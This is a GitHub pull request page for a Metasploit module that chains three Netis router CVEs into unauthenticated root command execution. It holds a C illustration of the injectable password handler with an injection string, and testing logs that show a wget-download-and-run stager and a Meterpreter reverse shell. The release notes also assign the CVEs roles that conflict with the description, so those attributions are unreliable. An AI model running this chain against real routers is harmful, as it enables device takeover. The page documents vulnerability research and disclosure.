
Netis Router Exploit Chain Reactor [CVE-2024-48455, CVE-2024-48456 and CVE-2024-48457] #19770

Merged (8 commits), Jan 8, 2025

Conversation

h00die-gr3y
Contributor

@h00die-gr3y h00die-gr3y commented Dec 27, 2024

Several Netis routers, including rebranded routers from GLCtec and Stonet, suffer from a command injection vulnerability on the change admin password page of the router web interface (see CVE-2024-48456 for more details).
The vulnerability stems from improper handling of the password and new password parameters within the router's web interface. Attackers can inject a command, encoded in base64, into the password or new password parameter to exploit the command injection vulnerability.
When exploited, this can lead to command execution, potentially allowing the attacker to take full control of the router.
An attacker needs to be authenticated to initiate this RCE; however, CVE-2024-48457 allows an unauthenticated attacker to reset the Wi-Fi and router password, hence gaining full root access to the router to execute the RCE.

Last but not least, CVE-2024-48455 allows for unauthenticated information disclosure revealing sensitive configuration information of the router which can be used by the attacker to determine if the router is running specific vulnerable firmware.

The following router firmware versions are vulnerable:

and potentially others...
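The bug class the description above names, written out as an added illustration in C. This is not the Netis firmware's code and not the Metasploit module's: the CGI parameter handling, the chpasswd invocation, the allow-list and the sample inputs are all assumptions constructed for the example (the benign password reuses the random one the module prints later in this thread). The vulnerable handler base64-decodes the submitted password and splices it into a shell command line; the hardened variant validates the decoded value and keeps the command line constant, passing the secret on stdin instead.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Map one base64 alphabet character to its 6-bit value, -1 if not in the alphabet. */
static int b64_value(char c) {
    if (c >= 'A' && c <= 'Z') return c - 'A';
    if (c >= 'a' && c <= 'z') return c - 'a' + 26;
    if (c >= '0' && c <= '9') return c - '0' + 52;
    if (c == '+') return 62;
    if (c == '/') return 63;
    return -1;
}

/* Decode standard base64 into out (NUL-terminated). Returns the decoded
 * length, or -1 on a non-alphabet character or an undersized buffer. */
int b64_decode(const char *in, char *out, size_t out_cap) {
    unsigned acc = 0;
    int bits = 0;
    size_t o = 0;
    if (out_cap == 0) return -1;
    for (const char *p = in; *p && *p != '='; p++) {
        int v = b64_value(*p);
        if (v < 0) return -1;
        acc = (acc << 6) | (unsigned)v;
        bits += 6;
        if (bits >= 8) {
            bits -= 8;
            if (o + 1 >= out_cap) return -1;
            out[o++] = (char)((acc >> bits) & 0xFF);
            acc &= (1u << bits) - 1;   /* keep only the leftover bits */
        }
    }
    out[o] = '\0';
    return (int)o;
}

/* VULNERABLE (the pattern the PR describes): the decoded "new password" is
 * spliced into a shell command line. Real firmware would hand cmd to
 * system()/popen(); this illustration only builds the string so the injection
 * is visible. The chpasswd pipeline is an assumption, not the router's code. */
int vuln_build_passwd_cmd(const char *b64_new_pw, char *cmd, size_t cmd_cap) {
    char pw[256];
    if (b64_decode(b64_new_pw, pw, sizeof pw) < 0) return -1;
    /* Single quotes are no defence: a ' in the payload closes them. */
    snprintf(cmd, cmd_cap, "echo 'root:%s' | chpasswd", pw);
    return 0;
}

/* HARDENED: allow-list the decoded value (no quotes, ';', '|', '`', '$', ':'
 * or whitespace), keep the command constant, and feed the secret to chpasswd
 * on stdin, where shell metacharacters are plain data. */
static const char SAFE_CHPASSWD_CMD[] = "/usr/sbin/chpasswd";

int safe_password_ok(const char *pw) {
    size_t len = strlen(pw);
    if (len < 8 || len > 64) return 0;
    for (size_t i = 0; i < len; i++) {
        unsigned char c = (unsigned char)pw[i];
        if (!isalnum(c) && strchr("!@#%^*_-.", c) == NULL) return 0;
    }
    return 1;
}

/* On success fills stdin_line with "root:<pw>\n" for chpasswd and returns 0;
 * returns -1 for malformed base64 or a password outside the allow-list. */
int safe_build_passwd_op(const char *b64_new_pw, char *stdin_line, size_t cap) {
    char pw[256];
    if (b64_decode(b64_new_pw, pw, sizeof pw) < 0) return -1;
    if (!safe_password_ok(pw)) return -1;
    int n = snprintf(stdin_line, cap, "root:%s\n", pw);
    return (n < 0 || (size_t)n >= cap) ? -1 : 0;
}

/* Wrappers so both handlers can be compared on the same input. */
int b64_decodes_to(const char *b64, const char *expect) {
    char buf[256];
    return b64_decode(b64, buf, sizeof buf) >= 0 && strcmp(buf, expect) == 0;
}
int vuln_cmd_contains(const char *b64_new_pw, const char *needle) {
    char cmd[512];
    if (vuln_build_passwd_cmd(b64_new_pw, cmd, sizeof cmd) != 0) return 0;
    return strstr(cmd, needle) != NULL;
}
int safe_accepts(const char *b64_new_pw) {
    char line[512];
    return safe_build_passwd_op(b64_new_pw, line, sizeof line) == 0;
}

int main(void) {
    /* Constructed inputs: base64("x'; id; '") and base64("rwmF2eT7AxZu"). */
    const char *injected = "eCc7IGlkOyAn", *benign = "cndtRjJlVDdBeFp1";
    char cmd[512], line[512];
    vuln_build_passwd_cmd(injected, cmd, sizeof cmd);
    printf("vulnerable handler would run: %s\n", cmd);
    printf("hardened handler accepts the same input: %s\n", safe_accepts(injected) ? "yes" : "no");
    if (safe_build_passwd_op(benign, line, sizeof line) == 0)
        printf("hardened handler runs %s with stdin: %s", SAFE_CHPASSWD_CMD, line);
    return 0;
}
```

The allow-list does the real work: rejecting ':' and newlines also stops an attacker from smuggling a second "user:pass" record into chpasswd's stdin, which a constant command line alone would not prevent.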

@bcoles bcoles added the module label Dec 28, 2024
@h00die-gr3y h00die-gr3y changed the title from "Netis Router unauthenticated RCE [CVE-2024-48455, CVE-2024-48456 and CVE-2024-48457]" to "Netis Router Exploit Chain Reactor [CVE-2024-48455, CVE-2024-48456 and CVE-2024-48457]" Dec 28, 2024
@jheysel-r7 jheysel-r7 self-assigned this Jan 6, 2025
Contributor

@jheysel-r7 jheysel-r7 left a comment


Hey @h00die-gr3y, thanks for the module! For the most part it looks good. I was having some issues getting a shell back from my emulated target. I don't think it's an issue with the module, it seems it's a networking issue, my emulated router can't connect back to my host:

~ # wget http://192.168.1.253:9090
Connecting to 192.168.1.253:9090 (192.168.1.253:9090)
wget: can't connect to remote host (192.168.1.253): No route to host

I tried manually adding routes / verifying iptables wasn't the issue, among other troubleshooting initiatives. I was running the emulation on a fresh Ubuntu 22.04 and was wondering what you were testing on? Or if you experienced any similar issues?

I was able to connect to the router's http server from my host, and the check method worked as expected; this is what my testing output looked like:

msf6 exploit(linux/http/netis_unauth_rce_cve_2024_48456_and_48457) > run 
[*] Started reverse TCP handler on 192.168.1.253:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 192.168.1.254:80 can be exploited.
[+] The target appears to be vulnerable. GLC(ALPHA-AC3)-V3.0.2.115
[*] Resetting router password for authentication.
[*] Logging in with the new router password rwmF2eT7AxZu to get the password cookie.
[*] Saving router credentials (root) at the msf database.
[*] Executing Linux Dropper for linux/mipsle/meterpreter_reverse_tcp
[*] Using URL: http://192.168.1.253:8080/CdbqYN
[*] Executing wget -qO /var/tmp/zwrNtOHP http://192.168.1.253:8080/CdbqYN
[*] Command Stager progress -  47.20% done (59/125 bytes)
[*] Executing chmod +x /var/tmp/zwrNtOHP
[*] Command Stager progress -  68.00% done (85/125 bytes)
[*] Executing /var/tmp/zwrNtOHP
[*] Command Stager progress -  81.60% done (102/125 bytes)
[*] Command Stager progress - 100.00% done (125/125 bytes)
[*] Server stopped.
[*] Exploit completed, but no session was created.

@h00die-gr3y
Contributor Author

h00die-gr3y commented Jan 7, 2025


@jheysel-r7,
Try to play with the CMD_DELAY option. There is a locking mechanism that kicks in if you send too many HTTP requests in a certain time frame. Sometimes 30 seconds is not sufficient. You can also check with Burp Suite, capturing the requests, to see if locking is the problem here.

Contributor

@jheysel-r7 jheysel-r7 left a comment


Hey @h00die-gr3y. Thanks for the suggestion. I had set up FirmAE on Ubuntu 22 despite their install instructions stating:

Note that we tested FirmAE on Ubuntu 18.04.

Outbound TCP connections from the emulated router seemed to be blocked for whatever reason. I re-set up on Ubuntu 18 and had no issues.

Testing

msf6 exploit(linux/http/netis_unauth_rce_cve_2024_48456_and_48457) > set rhost 192.168.1.254
rhost => 192.168.1.254
msf6 exploit(linux/http/netis_unauth_rce_cve_2024_48456_and_48457) > set lhost 192.168.1.253
lhost => 192.168.1.253
msf6 exploit(linux/http/netis_unauth_rce_cve_2024_48456_and_48457) > run
[*] Started reverse TCP handler on 192.168.1.253:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 192.168.1.254:80 can be exploited.
[+] The target appears to be vulnerable. GLC(ALPHA-AC3)-V3.0.2.115
[*] Resetting router password for authentication.
[*] Logging in with the new router password 3HZtVWwBVDX to get the password cookie.
[*] Saving router credentials (root) at the msf database.
[*] Executing Linux Dropper for linux/mipsle/meterpreter_reverse_tcp
[*] Using URL: http://192.168.1.253:8080/7PQoZIC
[*] Executing wget -qO /tmp/NcQZzmSJ http://192.168.1.253:8080/7PQoZIC
[*] Client 192.168.1.254 (Wget) requested /7PQoZIC
[*] Sending payload to 192.168.1.254 (Wget)
[*] Command Stager progress -  50.91% done (56/110 bytes)
[*] Executing chmod +x /tmp/NcQZzmSJ
[*] Command Stager progress -  70.91% done (78/110 bytes)
[*] Executing /tmp/NcQZzmSJ
[+] Deleted /tmp/NcQZzmSJ
[*] Meterpreter session 1 opened (192.168.1.253:4444 -> 192.168.1.254:35551) at 2025-01-07 16:39:36 -0800
[*] Command Stager progress -  82.73% done (91/110 bytes)
[*] Command Stager progress - 100.00% done (110/110 bytes)
[*] Server stopped.

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : 192.168.1.254
OS           :  (Linux 4.1.17+)
Architecture : mips
BuildTuple   : mipsel-linux-muslsf
Meterpreter  : mipsle/linux
meterpreter >

@jheysel-r7 jheysel-r7 added the docs and rn-modules (release notes for new or majorly enhanced modules) labels Jan 8, 2025
@jheysel-r7
Contributor

Release Notes

This adds an exploit module for Netis Routers including rebranded routers from GLCtec and Stonet. The module chains 3 CVEs together to accomplish unauthenticated RCE. The first, CVE-2024-48456, is a command injection vulnerability in the change admin password page which allows an attacker to change the admin password to one of their choosing. The next vulnerability, CVE-2024-48457, is an authenticated RCE which can be chained with the first vuln nicely. The last, CVE-2024-48455, allows for unauthenticated information disclosure revealing sensitive configuration information of the router which can be used by the attacker to determine if the router is running specific vulnerable firmware.

@jheysel-r7 jheysel-r7 merged commit 0ff2835 into rapid7:master Jan 8, 2025
39 checks passed
@jheysel-r7
Contributor

@h00die-gr3y PS. awesome job on finding these vulns 🎉 Loved reading through the research notes: h00die-gr3y/h00die-gr3y#2

@h00die-gr3y h00die-gr3y deleted the netis-unauth-rce branch January 8, 2025 08:42